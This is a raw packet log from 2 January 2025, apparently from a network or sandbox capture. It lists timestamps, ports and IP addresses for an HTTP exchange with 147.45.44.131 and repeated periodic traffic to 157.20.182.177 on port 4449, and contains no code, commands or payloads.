Jan 2, 2025 19:13:05.741899014 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741906881 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741919994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741921902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741940022 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741956949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741961956 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.741966963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741976976 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741986990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.741997004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742000103 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742007017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742017031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742021084 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742043018 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742060900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742084026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742093086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742101908 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742111921 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742120981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742127895 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742137909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742146969 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742155075 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742165089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742172956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742189884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742194891 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742199898 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742208958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742221117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742223978 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742232084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742238045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742243052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742253065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742255926 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742280960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742284060 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742290974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742300987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742316961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742326021 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742327929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742336988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742348909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742353916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742362022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742372036 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742383003 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742383003 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742392063 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742403030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742412090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742423058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742436886 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742459059 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742463112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742480040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742490053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742500067 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742505074 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742511034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742527008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742535114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742538929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742548943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742563009 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742566109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742574930 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742588043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742589951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742600918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742605925 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742610931 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742623091 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742631912 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742635012 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742644072 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742660999 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742682934 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742712975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742753029 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742856026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742866039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742882013 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742892027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742897034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742902994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742908001 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742913008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.742913008 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.742957115 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744704962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744714975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744724989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744740963 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744755983 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744761944 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744766951 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744780064 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744785070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744798899 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744807959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744816065 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744817972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744829893 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744839907 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744843960 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744849920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744857073 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744860888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744887114 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744888067 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744904995 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744914055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744916916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744926929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744937897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744940042 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744947910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744959116 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744967937 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744968891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744980097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.744986057 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.744990110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.745013952 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.745019913 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828265905 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828285933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828296900 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828306913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828316927 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828327894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828339100 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828427076 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828428030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828428030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828437090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828447104 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828458071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828468084 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828471899 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828483105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828485012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828495979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828505993 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828515053 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828516960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828533888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828541994 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828543901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828556061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828560114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828572989 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828583956 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828584909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828594923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828605890 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828612089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828614950 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828627110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828636885 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828636885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828654051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828663111 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828665972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828675985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828681946 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828687906 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828697920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828707933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828708887 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828717947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828728914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:05.828733921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828751087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.828768015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:05.902542114 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:08.548835039 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:08.554251909 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:08.554328918 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:08.608206034 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:08.613029957 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:09.155168056 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:09.174649954 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:09.179501057 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:09.349231958 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:09.553877115 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:12.064100027 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:12.069027901 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:12.069108009 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:12.073951006 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:24.915664911 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:24.920516968 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:24.920571089 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:24.925301075 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:25.221148968 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:25.273895025 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:25.344465017 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:25.350198984 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:25.355180979 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:25.355237961 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:25.359989882 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:37.774808884 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:37.779823065 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:37.779913902 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:37.784647942 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:38.100666046 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:38.149008989 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:38.234528065 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:38.289607048 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:38.321095943 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:38.325896978 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:38.325987101 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:38.330740929 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:50.633985996 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:50.638984919 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:50.639058113 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:50.643912077 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:50.964509964 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:51.008481979 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:51.110908985 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:51.113068104 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:51.117849112 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:13:51.117913961 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:13:51.122662067 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:03.493522882 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:03.498347044 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:03.498436928 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:03.503192902 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:03.792967081 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:03.836710930 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:03.923928022 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:03.935739994 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:03.940543890 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:03.940630913 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:03.945467949 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:16.352989912 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:16.357785940 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:16.360714912 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:16.365453005 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:16.697036982 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:16.743052006 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:16.830658913 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:16.834424019 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:16.839199066 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:16.840104103 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:16.844857931 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:29.212636948 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:29.217387915 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:29.219896078 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:29.224684954 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:29.513030052 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:29.639250040 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:29.643408060 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:29.645522118 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:29.650274992 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:29.650499105 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:29.655352116 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:34.884455919 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:34.889250040 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:34.889318943 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:34.894088984 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:35.187630892 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:35.243181944 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:35.315448999 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:35.317208052 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:35.322596073 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:35.322671890 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:35.328058958 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:46.056227922 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:46.061052084 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:46.061172962 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:46.066016912 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:46.356859922 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:46.445857048 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:46.487232924 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:46.489403009 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:46.494183064 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:46.494230032 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:46.499033928 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:47.401022911 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:47.406658888 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:47.413033009 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:47.418850899 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:47.704981089 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:47.838964939 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:47.841070890 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:47.897974968 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:47.902793884 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:14:47.903095961 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:14:47.907869101 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:00.262660980 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:00.267473936 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:00.267532110 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:00.272308111 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:00.559618950 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:00.621108055 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:00.690659046 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:00.692598104 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:00.697468996 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:00.697531939 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:00.702318907 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:02.384887934 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:02.389841080 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:02.389903069 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:02.394687891 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:02.691446066 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:02.818955898 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:02.820466995 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:02.899348021 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:02.904160976 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:02.904223919 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:02.909090996 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:15.244303942 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:15.249196053 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:15.249248981 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:15.253994942 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:15.549678087 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:15.618510962 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:15.675466061 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:15.677380085 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:15.682154894 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:15.682318926 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:15.687077045 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:20.338087082 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:20.343672037 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:20.343735933 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:20.348512888 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:20.637397051 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:20.727958918 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:20.784864902 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:20.786616087 CET	49732	4449	192.168.2.4	157.20.182.177
